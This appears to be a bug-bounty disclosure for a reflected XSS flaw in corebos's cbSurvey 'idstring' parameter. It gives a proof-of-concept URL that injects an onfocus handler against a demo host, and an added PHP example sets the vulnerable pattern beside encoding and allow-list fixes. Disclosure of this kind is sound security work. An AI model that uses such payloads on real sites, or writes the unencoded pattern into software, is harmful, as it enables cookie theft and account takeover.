Reflected XSS in "cbSurvey" module in tsolucio/corebos

Valid

Reported on Jun 26th 2022


Description

Reflected XSS due to bad sanitization of the "idstring" parameter in the cbSurvey module.

Proof of Concept

https://demo.corebos.com/index.php?module=cbSurvey&action=cbSurveyAjax&file=MassEdit&mode=ajax&idstring=" onfocus=javascript:alert(document.domain) type=txt autofocus="

Impact

Client-side code execution, which can lead to cookie stealing, account takeover, etc.
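
The class of bug described above, shown next to two mitigations. This is an added example, not corebos code and not part of the original report: the hidden-input markup, the function names, and the assumption that "idstring" is a semicolon-separated list of numeric record ids are all hypothetical.

```php
<?php
// Added illustration; NOT corebos source. Markup, names and id format are assumptions.

// Vulnerable pattern: the request value is copied into a double-quoted
// attribute unchanged, so a '"' in the value ends the attribute early.
function render_unsafe(string $idstring): string
{
    return '<input type="hidden" name="idstring" value="' . $idstring . '">';
}

// Mitigation 1: encode for the HTML attribute context. ENT_QUOTES converts
// both quote characters, so the value can no longer close value="...".
function render_encoded(string $idstring): string
{
    $safe = htmlspecialchars($idstring, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="idstring" value="' . $safe . '">';
}

// Mitigation 2: allow-list the expected shape before using the value at all
// (assumed shape: numeric ids separated by ';', optional trailing ';').
// Returns the ids as strings, or null when the input does not match.
function parse_idstring(string $idstring): ?array
{
    if (!preg_match('/\A\d+(?:;\d+)*;?\z/', $idstring)) {
        return null; // reject outright rather than trying to clean the value
    }
    return array_values(array_filter(explode(';', $idstring), 'strlen'));
}

// The parameter value from the proof of concept above.
$poc = '" onfocus=javascript:alert(document.domain) type=txt autofocus="';

// Unencoded: the injected event handler and autofocus become real attributes.
echo render_unsafe($poc), PHP_EOL;

// Encoded: quotes are emitted as &quot; and the whole value stays inert text.
echo render_encoded($poc), PHP_EOL;

// Allow-list check on the PoC value and on a well-formed (constructed) value.
var_dump(parse_idstring($poc));
var_dump(parse_idstring('12;15;20'));
```

Encoding at output and validating at input are complementary: the first protects every place the value is rendered, the second keeps malformed values out of the rest of the request handling.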

We are processing your report and will contact the tsolucio/corebos team within 24 hours. (3 months ago)
We have contacted a member of the tsolucio/corebos team and are waiting to hear back. (3 months ago)
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. (3 months ago)
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. (3 months ago)
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. (2 months ago)
Joe Bordes validated this vulnerability a month ago
jhond0e has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Bordes confirmed that a fix has been merged on 8d80af a month ago
Joe Bordes has been awarded the fix bounty